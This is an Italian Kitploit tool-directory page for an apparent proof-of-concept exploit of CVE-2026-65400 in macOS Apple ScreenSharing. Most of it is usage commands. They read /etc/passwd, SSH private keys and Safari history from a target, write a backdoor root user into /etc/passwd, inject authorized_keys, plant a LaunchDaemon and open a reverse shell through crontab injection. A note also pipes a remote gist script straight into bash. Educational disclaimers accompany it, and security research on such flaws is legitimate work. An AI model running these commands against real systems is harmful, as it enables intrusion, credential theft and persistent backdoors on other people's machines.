Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-65400 — Exploit proof-of-concept per CVE-2026-65400 che consente lettura/scrittura autenticata di file, reverse shell e persistenza su macOS tramite Apple ScreenSharing. | Kitploit
Strumenti/GitHubGitHub/horkimhab/cve-2026-65400
Escalation di PrivilegiMeccanismi di PersistenzaExploitPost-ExploitAutenticazioneApprendimento e FormazioneStrumento di Accesso Remoto
GitHubhorkimhab/cve-2026-65400

CVE-2026-65400

Exploit proof-of-concept per CVE-2026-65400 che consente lettura/scrittura autenticata di file, reverse shell e persistenza su macOS tramite Apple ScreenSharing.

Vedi Repository
311023 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

CVE-2026-65400

Dona

Supporta la manutenzione di questo progetto con PayPal o scansionando il codice QR qui sotto.

paypal

Codice QR per la donazione

⚡ Uso Semplice

Usa questo progetto solo in ambienti sicuri e autorizzati come:

  • Macchine virtuali locali
  • Contenitori Docker
  • Configurazioni di laboratorio isolate
  • Ambienti di test di penetrazione autorizzati

Esempio di configurazione:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Esempio di utilizzo:

root@kitploit:~
# Read a File from Target

# Read /etc/passwd and display it
python3 exploit.py read -u root 192.168.1.100 /etc/passwd

# Read and save to a local file
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt

# Read a user's file
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt

# Write a File to Target

# Write a local file to target
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt

# Write with specific permissions (0600 for crontab)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600

# Write from stdin
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -

# Get a Reverse Shell (SIP Disabled Only)

# On your attacker machine, start a listener in another terminal
nc -nlvp 4444

# Run the exploit
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# Where:
#   192.168.1.100 = target Mac IP
#   192.168.1.50  = your attacker IP
#   4444          = port for reverse shell

# Example 1: Reading System Files
# Read the shadow file (if accessible)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist

# Read Safari history
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db

# Read SSH keys (if they exist)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa

# Example 2: Writing Files

# Create a backdoor user
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt

# Inject SSH key
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub

# Write a startup script
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist

# Example 3: SIP Detection

python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444

# Output if SIP is enabled:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead

# Output if SIP is disabled:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds

# Authentication Bypass Retry
# Increase retry count if it fails
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50

# Port Specification

python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901

Nota:

  • se cloni da un altro progetto devi eseguire curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y per eliminare la directory .git annidata
  • ad es: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crediti o Riferimenti

  • https://warez.sl0p.foo/apple-screensharing-rce/
  • https://blog.calif.io/p/no-country-for-old-passwords

📚 Repository Educativo di Ricerca sulla Sicurezza

Un repository per apprendere, testare e ricercare concetti di cybersecurity in ambienti controllati.


⚠️ Disclaimer di Sicurezza e Legale

Scopo

Questo repository è destinato esclusivamente alla ricerca sulla sicurezza autorizzata e a scopo educativo.

È progettato per aiutare gli utenti a conoscere:

  • Vulnerabilità di sicurezza
  • Concetti di sandbox e isolamento
  • Pratiche di codifica sicura e difensive

Solo Uso Autorizzato

Utilizza questo repository solo in ambienti in cui hai il permesso, come:

  • Laboratori personali o macchine virtuali
  • Ambienti Docker o isolati
  • Test di penetrazione autorizzati
  • Formazione sulla cybersecurity o ricerca accademica

L'uso non autorizzato o illegale è severamente proibito.


Nessuna Responsabilità

L'autore e i collaboratori non sono responsabili per qualsiasi danno, uso improprio, problema legale o perdita causati da questo progetto.

Utilizzando questo repository, accetti che:

  • Sei responsabile delle tue azioni
  • Lo utilizzerai in modo legale ed etico
  • Il progetto è fornito senza garanzia

Uso Etico

Questo progetto è pensato per:

  • Ricerca sulla sicurezza difensiva
  • Educazione alla cybersecurity
  • Consapevolezza delle vulnerabilità
  • Ricerca su sistemi e software sicuri

Si prega di seguire le pratiche di divulgazione responsabile e di rispettare tutte le leggi applicabili.


Contatti

Per divulgazione responsabile o collaborazione, contatta il manutentore del repository tramite GitHub.


Progetto Correlato

Esplora la Raccolta di PoC CVE per ulteriori risorse proof-of-concept relative alle CVE, destinate alla ricerca sulla sicurezza autorizzata e all'istruzione.

Scarica lo strumento